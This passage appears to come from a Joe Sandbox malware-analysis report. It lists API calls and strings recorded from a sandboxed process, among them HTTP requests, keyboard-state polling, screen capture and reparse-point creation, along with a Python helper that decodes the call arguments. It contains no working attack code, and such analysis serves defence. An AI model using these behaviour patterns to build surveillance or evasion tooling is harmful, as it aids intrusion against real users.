                                                • Part of subcall function 00EA047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00EC2753,000000FF), ref: 00EA04C8
                                                • Part of subcall function 00EA047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00EA04DE
                                                • Part of subcall function 00EA047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00EA04EC
                                                • Part of subcall function 00EA047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00EA04FA
                                                • Part of subcall function 00EA047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EA0525
                                                • Part of subcall function 00EA047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EA0530
                                              • ___scrt_fastfail.LIBCMT ref: 00EA0477
                                                • Part of subcall function 00EA0433: __onexit.LIBCMT ref: 00EA0439
                                              Strings
                                              • InitializeConditionVariable, xrefs: 00EA04D8
                                              • WakeAllConditionVariable, xrefs: 00EA04F2
                                              • SleepConditionVariableCS, xrefs: 00EA04E4
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00EA04B2
                                              • kernel32.dll, xrefs: 00EA04C3
                                              Similarity
                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 66158676-1714406822
                                              • Opcode ID: 73d71be3f45716419851edab87ff0816321c4871aef08c8ebe758cf137596f1c
                                              • Instruction ID: d79243e1da296b44d0306a13450566d4b53e1db01a0d448552497401d2715797
                                              • Opcode Fuzzy Hash: 73d71be3f45716419851edab87ff0816321c4871aef08c8ebe758cf137596f1c
                                              • Instruction Fuzzy Hash: 8521F632A457147FE7216BA8BC15BA937E4EB0EB65F015129F911BA290DF60BC009A51
                                              APIs
                                              • CharLowerBuffW.USER32(00000000,00000000,00F1DCD0), ref: 00EF4E81
                                              • _wcslen.LIBCMT ref: 00EF4E95
                                              • _wcslen.LIBCMT ref: 00EF4EF3
                                              • _wcslen.LIBCMT ref: 00EF4F4E
                                              • _wcslen.LIBCMT ref: 00EF4F99
                                              • _wcslen.LIBCMT ref: 00EF5001
                                                • Part of subcall function 00E9FD60: _wcslen.LIBCMT ref: 00E9FD6B
                                              • GetDriveTypeW.KERNEL32(?,00F47C10,00000061), ref: 00EF509D
                                              Strings
                                              Similarity
                                              • API ID: _wcslen$BuffCharDriveLowerType
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2055661098-1000479233
                                              • Opcode ID: 79f9199ff878ab1edea0c026233e2f74df86987b2544cc890b9ca9d78aa4ecdf
                                              • Instruction ID: 61b7ada767cdeb0f14f34a8d771ef6cab4e79892939819b1d9125d001eae5856
                                              • Opcode Fuzzy Hash: 79f9199ff878ab1edea0c026233e2f74df86987b2544cc890b9ca9d78aa4ecdf
                                              • Instruction Fuzzy Hash: 1EB107722087069FC710EF28C890A7BB7E5FFA4714F50691DF699A7292DB30D844C792
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00F1DCD0), ref: 00F04A18
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F04A2A
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00F1DCD0), ref: 00F04A4F
                                              • FreeLibrary.KERNEL32(00000000,?,00F1DCD0), ref: 00F04A9B
                                              • StringFromGUID2.OLE32(?,?,00000028,?,00F1DCD0), ref: 00F04B05
                                              • SysFreeString.OLEAUT32(00000009), ref: 00F04BBF
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F04C25
                                              • SysFreeString.OLEAUT32(?), ref: 00F04C4F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 354098117-199464113
                                              • Opcode ID: 529eaa99d7101377b4564f3771126cf2e3cdf04d35bc4c8dd22179b4f1d00122
                                              • Instruction ID: be709c53919f2ab27a11ef5ad27e85647eae25df2f4b33e8fe75119240a7534a
                                              • Opcode Fuzzy Hash: 529eaa99d7101377b4564f3771126cf2e3cdf04d35bc4c8dd22179b4f1d00122
                                              • Instruction Fuzzy Hash: 55123FB1A00119EFDB14DF54C884EAEB7B5FF85314F148098EA19AB291D731FD46EBA0
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EFCE0D
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EFCE20
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EFCE34
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EFCE4D
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EFCE90
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EFCEA6
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EFCEB1
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EFCEE1
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EFCF39
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EFCF4D
                                              • InternetCloseHandle.WININET(00000000), ref: 00EFCF58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                              • String ID:
                                              • API String ID: 3800310941-3916222277
                                              • Opcode ID: 03b96e64136fcdcca751c6ab6bcef07550a66056282c7d5bb6e7014ba6c5f5e4
                                              • Instruction ID: d81068cdb5de691a233d7b7190f4290704ea4b26d8e462b7783c9d93481b5914
                                              • Opcode Fuzzy Hash: 03b96e64136fcdcca751c6ab6bcef07550a66056282c7d5bb6e7014ba6c5f5e4
                                              • Instruction Fuzzy Hash: 28515E7160060CBFDB219F60CE48ABABBFDFF08758F209419FA49A6150D735D944ABA0
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00F18EF1
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F01
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F0C
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F19
                                              • GlobalLock.KERNEL32(00000000), ref: 00F18F27
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F36
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F18F3F
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F46
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F57
                                              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00F20C04,?), ref: 00F18F70
                                              • GlobalFree.KERNEL32(00000000), ref: 00F18F80
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00F18FA0
                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00F18FD0
                                              • DeleteObject.GDI32(?), ref: 00F18FF8
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F1900E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: d54d1fbd04f61270e334ae7d2985c4efaa51bc2e9b4c2fe03c6098577b5d8c5f
                                              • Instruction ID: 825ea67e640dcb0e905eefe3806e774003d9275075360cc8bdaa347ed9768e99
                                              • Opcode Fuzzy Hash: d54d1fbd04f61270e334ae7d2985c4efaa51bc2e9b4c2fe03c6098577b5d8c5f
                                              • Instruction Fuzzy Hash: 0B413A71600208BFDB11DF65DD88EEA7BB9FF89761F118058F915E7260DB709942EB20
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00F02F35
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F02F45
                                              • CreateCompatibleDC.GDI32(?), ref: 00F02F51
                                              • SelectObject.GDI32(00000000,?), ref: 00F02F5E
                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F02FCA
                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F03009
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F0302D
                                              • SelectObject.GDI32(?,?), ref: 00F03035
                                              • DeleteObject.GDI32(?), ref: 00F0303E
                                              • DeleteDC.GDI32(?), ref: 00F03045
                                              • ReleaseDC.USER32(00000000,?), ref: 00F03050
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 936edd2943b5afb2d9c2c99e086e27c2f1cbd3918ad556345a614453315f3634
                                              • Instruction ID: c2274db9ac1a69df1e826d247d1dfed79e00c9aad519cb68bc1855fc33d4ca00
                                              • Opcode Fuzzy Hash: 936edd2943b5afb2d9c2c99e086e27c2f1cbd3918ad556345a614453315f3634
                                              • Instruction Fuzzy Hash: 0D61E2B5E00219EFDF04CFA4D884AAEBBF6FF48310F208519E955A7250D775A941EFA0
                                              APIs
                                              • GetMenuItemInfoW.USER32(00F52990,000000FF,00000000,00000030), ref: 00EEC888
                                              • SetMenuItemInfoW.USER32(00F52990,00000004,00000000,00000030), ref: 00EEC8BD
                                              • Sleep.KERNEL32(000001F4), ref: 00EEC8CF
                                              • GetMenuItemCount.USER32(?), ref: 00EEC915
                                              • GetMenuItemID.USER32(?,00000000), ref: 00EEC932
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00EEC95E
                                              • GetMenuItemID.USER32(?,?), ref: 00EEC9A5
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EEC9EB
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EECA00
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EECA21
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                              • String ID: 0
                                              • API String ID: 1460738036-4108050209
                                              • Opcode ID: 03824f8bcd2da740a164158e652958fb83e44250df2b692f2eef5e3c2d4316dc
                                              • Instruction ID: ce1a3166c378da454f0a33d0b87d618e3d30a69c743c1edaf22ebc66922db2e6
                                              • Opcode Fuzzy Hash: 03824f8bcd2da740a164158e652958fb83e44250df2b692f2eef5e3c2d4316dc
                                              • Instruction Fuzzy Hash: 81619E7090028DABDF15CF69D888AFE7BB9FB45308F245129E945B3251D735AD02DB60
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00EEE3E9
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00EEE40F
                                              • _wcslen.LIBCMT ref: 00EEE419
                                              • _wcsstr.LIBVCRUNTIME ref: 00EEE469
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EEE485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 1939486746-1459072770
                                              • Opcode ID: 83d93b8985123193b9f5dbdcabc6e469e6abf1cd8bd971772fe21617c633485f
                                              • Instruction ID: d62863c943bfe226fd5b36e34356cbfa68620321a8132936017210d3afffa5dd
                                              • Opcode Fuzzy Hash: 83d93b8985123193b9f5dbdcabc6e469e6abf1cd8bd971772fe21617c633485f
                                              • Instruction Fuzzy Hash: B441F5726402187AEB00BB658C47EFF7BBCDF5A710F105425F905BA1C2EB74EA01A6A5
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EF469A
                                              • _wcslen.LIBCMT ref: 00EF46C7
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EF46F7
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EF4718
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00EF4728
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EF47AF
                                              • CloseHandle.KERNEL32(00000000), ref: 00EF47BA
                                              • CloseHandle.KERNEL32(00000000), ref: 00EF47C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                              • String ID: :$\$\??\%s
                                              • API String ID: 1149970189-3457252023
                                              • Opcode ID: 81ed05ae963a57f0b925ab7167653066634ae5a561873a02f27632ad25b9087d
                                              • Instruction ID: 6bdc4d785cac455d4ed74455d94cf7a0bbc4082a012643a5637f8c47e4f899ff
                                              • Opcode Fuzzy Hash: 81ed05ae963a57f0b925ab7167653066634ae5a561873a02f27632ad25b9087d
                                              • Instruction Fuzzy Hash: CB31D4B190024DABDB20AFA0DC48FFB37BDEF89744F1051AAF615E61A0E77497449B24
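The record just above (GetFullPathNameW, CreateDirectoryW, CreateFileW, DeviceIoControl with the `\??\%s` string) and the WinINet record earlier in this section (InternetQueryOptionW/InternetSetOptionW with option 0000001F, HttpQueryInfoW with level 00000005) show their arguments only as raw hex stack values. The Python below is an added example for reading such lines; it is not Joe Sandbox code and not part of the AutoIt runtime that process 8 is running. It splits the DeviceIoControl code 0x900A4 into its CTL_CODE fields (FILE_DEVICE_FILE_SYSTEM, function 41, METHOD_BUFFERED, which is FSCTL_SET_REPARSE_POINT), expands CreateFileW's 0x02200000 into FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, and names WinINet option 31 (INTERNET_OPTION_SECURITY_FLAGS) and HttpQueryInfoW level 5 (HTTP_QUERY_CONTENT_LENGTH). The constant tables are taken from the Windows SDK headers; the line format is assumed from the lines shown on this page, and the sample input is copied from those lines. One caveat a reader should keep: Joe Sandbox prints stack slots, and the third argument of InternetSetOptionW is lpBuffer (a pointer), so the value 00000100 only coincides with SECURITY_FLAG_IGNORE_UNKNOWN_CA; the listing does not say whether the tool dereferenced the buffer, so the example labels that decoding as tentative.

```python
"""Annotate the numeric arguments in Joe Sandbox "APIs" lines.

Added example for reading this report; not Joe Sandbox code.  Constant
values come from the Windows SDK headers (winioctl.h, winnt.h, wininet.h).
"""
import re
from typing import Dict, List, Optional

# Joe Sandbox prints each call as:  Name.MODULE(arg,arg,...), ref: ADDR
API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # 8-digit slots; "?" and strings stay None

# CTL_CODE(DeviceType, Function, Method, Access) packs as
#   DeviceType << 16 | Access << 14 | Function << 2 | Method      (winioctl.h)
FILE_DEVICE_FILE_SYSTEM = 0x9
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
# Reparse-point FSCTLs: FILE_DEVICE_FILE_SYSTEM, METHOD_BUFFERED, functions 41..43
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT",
                   42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}

# CreateFileW argument tables
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH",
              0x40000000: "FILE_FLAG_OVERLAPPED",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT"}

# WinINet tables
INTERNET_OPTIONS = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
SECURITY_FLAGS = {0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
                  0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
                  0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}


def decode_ioctl(code: int) -> Dict[str, object]:
    """Split a DeviceIoControl code into CTL_CODE fields; name it when it is a known FSCTL."""
    device, function, method = (code >> 16) & 0xFFFF, (code >> 2) & 0xFFF, code & 0x3
    name = FSCTL_FUNCTIONS.get(function) if (device == FILE_DEVICE_FILE_SYSTEM and method == 0) else None
    return {"device": device, "function": function, "method": METHODS[method],
            "access": (code >> 14) & 0x3, "name": name}


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bit mask into names from `table` (low bit first); leftover bits are kept as hex."""
    names = [n for bit, n in sorted(table.items()) if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    return names + ([hex(rest)] if rest else [])


def parse_args(raw: str) -> List[Optional[int]]:
    """Convert each comma-separated slot to int if Joe Sandbox printed it as 8 hex digits."""
    return [int(t.strip(), 16) if HEX_ARG.match(t.strip()) else None for t in raw.split(",")]


def annotate(line: str) -> Dict[str, object]:
    """Parse one API line and attach readable notes for the constants it carries."""
    m = API_LINE.search(line)
    if not m:
        raise ValueError("not a Joe Sandbox API line: " + line)
    name, args = m.group("name"), parse_args(m.group("args"))
    notes: List[str] = []
    if name == "DeviceIoControl" and len(args) > 1 and args[1] is not None:
        d = decode_ioctl(args[1])
        notes.append("ioctl=%s (device 0x%X, function %d, %s)"
                     % (d["name"] or "unknown", d["device"], d["function"], d["method"]))
    elif name == "CreateFileW" and len(args) >= 6:
        if args[1] is not None:
            notes.append("access=" + "|".join(decode_flags(args[1], GENERIC_ACCESS)))
        if args[4] is not None:
            notes.append("disposition=" + CREATION.get(args[4], hex(args[4])))
        if args[5] is not None:
            notes.append("flags=" + ("|".join(decode_flags(args[5], FILE_FLAGS)) or "0"))
    elif name in ("InternetSetOptionW", "InternetQueryOptionW") and len(args) > 2 and args[1] in INTERNET_OPTIONS:
        notes.append("option=" + INTERNET_OPTIONS[args[1]])
        # Third slot of InternetSetOptionW is lpBuffer, a pointer: decoding it as the
        # flag word is only valid if the sandbox dereferenced it, so mark it tentative.
        if name == "InternetSetOptionW" and args[2] is not None:
            notes.append("buffer-slot-as-flags=" + "|".join(decode_flags(args[2], SECURITY_FLAGS)))
    elif name == "HttpQueryInfoW" and len(args) > 1 and args[1] in HTTP_QUERY:
        notes.append("info-level=" + HTTP_QUERY[args[1]])
    return {"api": name, "module": m.group("module"), "ref": m.group("ref"), "notes": notes}


# Sample input: lines copied verbatim from the records on this page.
SAMPLE_LINES = [
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EF4718",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EF47AF",
    "InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EFCE90",
    "InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EFCEA6",
    "HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EFCEE1",
]


def annotate_all(lines: List[str] = SAMPLE_LINES) -> List[Dict[str, object]]:
    return [annotate(line) for line in lines]


if __name__ == "__main__":
    for r in annotate_all():
        print(r["api"], r["ref"], "; ".join(r["notes"]))
```

Read together, the decoded record is a directory opened for write with backup semantics and the reparse-point flag, FSCTL_SET_REPARSE_POINT issued on it, and RemoveDirectoryW available as rollback; the `\??\%s` string is the NT-path prefix that a junction or symbolic-link reparse buffer carries as its substitute name. That is ordinary NTFS link creation, and the listing alone does not show what the link points at or whether the call succeeded, so it is a lead for the dropped-file and registry sections rather than a finding by itself.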
                                              APIs
                                              • timeGetTime.WINMM ref: 00EEEEE0
                                                • Part of subcall function 00E9F27E: timeGetTime.WINMM(?,?,00EEEF00), ref: 00E9F282
                                              • Sleep.KERNEL32(0000000A), ref: 00EEEF0D
                                              • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 00EEEF31
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EEEF53
                                              • SetActiveWindow.USER32 ref: 00EEEF72
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EEEF80
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EEEF9F
                                              • Sleep.KERNEL32(000000FA), ref: 00EEEFAA
                                              • IsWindow.USER32 ref: 00EEEFB6
                                              • EndDialog.USER32(00000000), ref: 00EEEFC7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: 9f6aeffa84fbdd1bd0a6b835eda192b9bff8e217c1463a670ea7af3365cf9d60
                                              • Instruction ID: 419e15d647f275aec3fcbfcd650a0a2f1ce9259b31e5ed91d2e2a1e53cbc8b36
                                              • Opcode Fuzzy Hash: 9f6aeffa84fbdd1bd0a6b835eda192b9bff8e217c1463a670ea7af3365cf9d60
                                              • Instruction Fuzzy Hash: 4C21967020034DBFEB006F65EC89E663B7AFB4538AB155418F611A13B1CB758D01F664
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00EEA8EE
                                              • SetKeyboardState.USER32(?), ref: 00EEA959
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00EEA979
                                              • GetKeyState.USER32(000000A0), ref: 00EEA990
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00EEA9BF
                                              • GetKeyState.USER32(000000A1), ref: 00EEA9D0
                                              • GetAsyncKeyState.USER32(00000011), ref: 00EEA9FC
                                              • GetKeyState.USER32(00000011), ref: 00EEAA0A
                                              • GetAsyncKeyState.USER32(00000012), ref: 00EEAA33
                                              • GetKeyState.USER32(00000012), ref: 00EEAA41
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00EEAA6A
                                              • GetKeyState.USER32(0000005B), ref: 00EEAA78
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
